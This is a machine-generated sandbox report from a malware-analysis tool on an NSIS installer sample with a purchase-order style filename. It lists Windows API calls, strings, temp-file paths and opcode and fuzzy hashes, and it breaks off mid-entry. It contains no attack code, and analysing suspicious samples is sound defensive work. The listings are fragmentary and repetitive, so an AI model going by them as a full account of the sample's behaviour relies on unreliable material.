• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: Char$Next$Prev
• String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
• API String ID: 589700163-2185277754
• Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
• Instruction ID: e323e08bdfda0f150b574f83967a69ba6361760ee6a09b3ffc5edc4c10c5e242
• Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
• Instruction Fuzzy Hash: 01118F91808B926EFB3216244C44B7BAF898B577A4F18007BE5C5722C2DA7C5C429B6E
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 00403F75
• GetSysColor.USER32(00000000), ref: 00403F91
• SetTextColor.GDI32(?,00000000), ref: 00403F9D
• SetBkMode.GDI32(?,?), ref: 00403FA9
• GetSysColor.USER32(?), ref: 00403FBC
• SetBkColor.GDI32(?,?), ref: 00403FCC
• DeleteObject.GDI32(?), ref: 00403FE6
• CreateBrushIndirect.GDI32(?), ref: 00403FF0
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
• Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
• Instruction ID: 03c35b03fdde5f33accd48f8e357bf0732577442a8f103693b6bf1e6191b16fb
• Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
• Instruction Fuzzy Hash: 71216271904705ABCB219F68ED48B4BBFF8AF01715B04892AF996A22E0D734EA04CB55
APIs
• GlobalFree.KERNEL32(00000000), ref: 1000234A
  • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
• GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
• GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
• CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
• GlobalFree.KERNEL32(00000000), ref: 100022FB
Memory Dump Source
• Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
• String ID:
• API String ID: 3730416702-0
• Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
• Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
• Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
• Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
APIs
  • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
• GlobalFree.KERNEL32(?), ref: 100024B5
• GlobalFree.KERNEL32(00000000), ref: 100024EF
Memory Dump Source
• Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: Global$Free$Alloc
• String ID:
• API String ID: 1780285237-0
• Opcode ID: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
• Instruction ID: 4e6b36a645f71e2aed4a85f2c36ff1861f2741140ba068ae73f9b0a79c1593cf
• Opcode Fuzzy Hash: 8ed12168559ed504bf2d16f5614b25cf9b7800a5843296302d7a865f42518c80
• Instruction Fuzzy Hash: EA319CB1504250EFF322CF64CCC4C6B7BBDEB852D4B124529FA4193168CB31AC94DB62
APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040480B
• GetMessagePos.USER32 ref: 00404813
• ScreenToClient.USER32(?,?), ref: 0040482D
• SendMessageA.USER32(?,00001111,00000000,?), ref: 0040483F
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404865
Strings
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
• Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
• Instruction ID: d51aeaa30401db709ca0a87e6a09b4ddb89123452d3ebce91a639796f0b83af5
• Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
• Instruction Fuzzy Hash: 54019275D00218BADB00DBA4CC41BFEBBBCAF85711F10412BBB10B71C0C7B465018BA5
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
• MulDiv.KERNEL32(000DEEFB,00000064,000E0340), ref: 00402BC5
• wsprintfA.USER32 ref: 00402BD5
• SetWindowTextA.USER32(?,?), ref: 00402BE5
• SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
Strings
• verifying installer: %d%%, xrefs: 00402BCF
Memory Dump Source
• Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                      • String ID: verifying installer: %d%%
                                                                      • API String ID: 1451636040-82062127
                                                                      • Opcode ID: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                      • Instruction ID: 06d6233bfb864841df38fb05631849b064d35824abf3621066cb5e46443ac4cc
                                                                      • Opcode Fuzzy Hash: 3ae07b054ad9b81f5b6108b272be1fee9de0c5ac9c6f7af5c303f160919c41b2
                                                                      • Instruction Fuzzy Hash: EE014F70540209FBEF209F60DD4AEAE3B69AB04304F00803AFA16B92D0D7B8A951DB59
                                                                      APIs
                                                                      • GetDC.USER32(?), ref: 00401D3B
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                      • CreateFontIndirectA.GDI32(0040A7F0), ref: 00401DB3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                      • String ID: Tahoma
                                                                      • API String ID: 3808545654-3580928618
                                                                      • Opcode ID: 7cd5ed8a4b4f09cdd512241ed4d77026764b80ee4c75be1284d7c37bf19adfef
                                                                      • Instruction ID: cf9238c777b6589bee1a324002302adcb4b1f2371c80511fc572ea77625e262b
                                                                      • Opcode Fuzzy Hash: 7cd5ed8a4b4f09cdd512241ed4d77026764b80ee4c75be1284d7c37bf19adfef
                                                                      • Instruction Fuzzy Hash: 96016232948740AFE7416B70AE1AFAA3FB4A755305F108479F201B72E2C67811569B3F
                                                                      APIs
                                                                      • GlobalAlloc.KERNEL32(00000040,00008A00,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                      • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                      • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                      • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                      • String ID:
                                                                      • API String ID: 2667972263-0
                                                                      • Opcode ID: c372e968d9e395b418133328b66b822104ab768b7d8a0d8c505769ff06cebaf7
                                                                      • Instruction ID: f67dc9fade15bd1aaf4953b10d7ffc98cf8df4ed40540c93fb8cebdcb82cf2c3
                                                                      • Opcode Fuzzy Hash: c372e968d9e395b418133328b66b822104ab768b7d8a0d8c505769ff06cebaf7
                                                                      • Instruction Fuzzy Hash: 71217A71800128BBCF216FA5DE49EAEBB79EF09324F10022AF914762E1C7795D018B99
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(0079E540,0079E540,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404601,000000DF,00000000,00000400,?), ref: 00404784
                                                                      • wsprintfA.USER32 ref: 0040478C
                                                                      • SetDlgItemTextA.USER32(?,0079E540), ref: 0040479F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                      • String ID: %u.%u%s%s$@y
                                                                      • API String ID: 3540041739-3020698753
                                                                      • Opcode ID: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                      • Instruction ID: 4638cabbc4a31f91baf710fec8468dae319bf79d1b1f68d9e24bb075fcb279e4
                                                                      • Opcode Fuzzy Hash: ca56fcb4ff96a92767a948c37e1cdc386e941f7d7930a18b2193be96cb950031
                                                                      • Instruction Fuzzy Hash: D911E7736041283BEB00656D9D45EEF328CDB86374F254237FA25F31D1EA78CC1146A8
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2632503904.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000000.00000002.2632485014.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.2632520015.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000000.00000002.2632534659.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_10000000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: FreeGlobal
                                                                      • String ID:
                                                                      • API String ID: 2979337801-0
                                                                      • Opcode ID: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                      • Instruction ID: adaf369aa6dab84e94bee76403d526b7d43184adb12fe210256c1aedb67fe499
                                                                      • Opcode Fuzzy Hash: 83a27a6a764e204457f331ddef67b06d43c1ca0f526d792f63dc3af4834dec0e
                                                                      • Instruction Fuzzy Hash: 43512536D04159AEFB55DFB488A4AEEBBF6EF453C0F124169E841B315DCA306E4087D2
                                                                      APIs
                                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A9B
                                                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DeleteEnumOpen
                                                                      • String ID:
                                                                      • API String ID: 1912718029-0
                                                                      • Opcode ID: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                      • Instruction ID: 557db050c0314b8bb5c0b22d2db4fc3530b60cfc711b7b252a141f8c1691c263
                                                                      • Opcode Fuzzy Hash: b56f379d4c7718a716cd2f0f4935c5eaa8b38fc1cc2d991abe85072f08e57da9
                                                                      • Instruction Fuzzy Hash: 82114272900109FFEF229F50DE89DAE3B7DEB54344B104436F901B10A0D7B59E51DB69
                                                                      APIs
                                                                      • GetDlgItem.USER32(?), ref: 00401CE2
                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                                                      • DeleteObject.GDI32(00000000), ref: 00401D2D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                      • String ID:
                                                                      • API String ID: 1849352358-0
                                                                      • Opcode ID: 0583b6918c16dec0e269df833e9dc84b1bd36602652c7031110f346e7b3842d0
                                                                      • Instruction ID: 92ae7547fb934e5b20a31b6555936ed9a04085bedc3b988c85494c1bea2cd4ea
                                                                      • Opcode Fuzzy Hash: 0583b6918c16dec0e269df833e9dc84b1bd36602652c7031110f346e7b3842d0
                                                                      • Instruction Fuzzy Hash: CCF0E7B2A04114AFEB01ABE4DE88DAFB7BDFB54305B10446AF602F6191C7789D018B79
                                                                      APIs
                                                                      • SetWindowTextA.USER32(00000000,Regangen Setup), ref: 004039E9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2608013440.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608047008.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077A000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000077F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000784000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.0000000000787000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608064111.00000000007BC000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2608699661.00000000007BE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: TextWindow
                                                                      • String ID: "C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe"$1033$Regangen Setup
                                                                      • API String ID: 530164218-1124990733
                                                                      • Opcode ID: 85ceab019c87a04c69db0eea1a6fbc710d8651cdce0cfd73114f661218e3a08a
                                                                      • Instruction ID: a7121fc51e20562cbfa027eee4ba04e2135699cbca2cdd3690fce58e300c9c30
                                                                      • Opcode Fuzzy Hash: 85ceab019c87a04c69db0eea1a6fbc710d8651cdce0cfd73114f661218e3a08a
                                                                      • Instruction Fuzzy Hash: 8311D1B5B056108BE720DF15DC80A73776CEBC6755B28813FE841A73E1D73D9D028A98
                                                                      APIs
                                                                        • Part of subcall function 00405D0C: lstrcpynA.KERNEL32(?,?,00000400,0040319A,Regangen Setup,NSIS Error), ref: 00405D19
                                                                        • Part of subcall function 00405817: CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,?,00405883,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                        • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040582A
                                                                        • Part of subcall function 00405817: CharNextA.USER32(00000000), ref: 0040583E
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058BF
                                                                      • GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\), ref: 004058CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsq8002.tmp
                                                                      • API String ID: 3248276644-2648826227
                                                                      APIs
                                                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 00405784
                                                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032DC), ref: 0040578D
                                                                      • lstrcatA.KERNEL32(?,00409014), ref: 0040579E
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                      • API String ID: 2659869361-4083868402
                                                                      APIs
                                                                      • CharNextA.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,?,00405883,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,C:\Users\user\AppData\Local\Temp\nsq8002.tmp,75573410,?,C:\Users\user\AppData\Local\Temp\,004055CE,?,75573410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405825
                                                                      • CharNextA.USER32(00000000), ref: 0040582A
                                                                      • CharNextA.USER32(00000000), ref: 0040583E
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\nsq8002.tmp, xrefs: 00405818
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq8002.tmp
                                                                      • API String ID: 3213498283-2063696683
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                                                      • GetTickCount.KERNEL32 ref: 00402C33
                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_PO-10212024168877 PNG2023-W101.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                      • String ID:
                                                                      • API String ID: 2102729457-0
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 00404EC8
                                                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00404F19
                                                                        • Part of subcall function 00403F3D: SendMessageA.USER32(00010426,00000000,00000000,00000000), ref: 00403F4F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2608029986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
